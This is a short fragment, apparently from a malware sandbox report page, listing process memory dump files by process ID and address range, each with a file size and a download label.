Filesize
84KB

Download
memory/5020-676-0x0000000000A90000-0x0000000000F50000-memory.dmp

Filesize
4.8MB

Download
memory/5020-960-0x0000000000A90000-0x0000000000F50000-memory.dmp

Filesize
4.8MB

Download
memory/5156-1229-0x0000000006ED0000-0x0000000006F1B000-memory.dmp

Filesize
300KB

Download
memory/5180-1122-0x0000017FF0E90000-0x0000017FF0F06000-memory.dmp

Filesize
472KB

Download
memory/5180-1119-0x0000017FF0CE0000-0x0000017FF0D02000-memory.dmp

Filesize
136KB

Download
memory/5528-2036-0x0000000000A90000-0x0000000000F50000-memory.dmp

Filesize
4.8MB

Download
memory/5528-2034-0x0000000000A90000-0x0000000000F50000-memory.dmp

Filesize
4.8MB

Download
memory/5732-1066-0x0000000000A90000-0x0000000000F50000-memory.dmp

Filesize
4.8MB

Download
memory/5732-1070-0x0000000000A90000-0x0000000000F50000-memory.dmp

Filesize
4.8MB

Download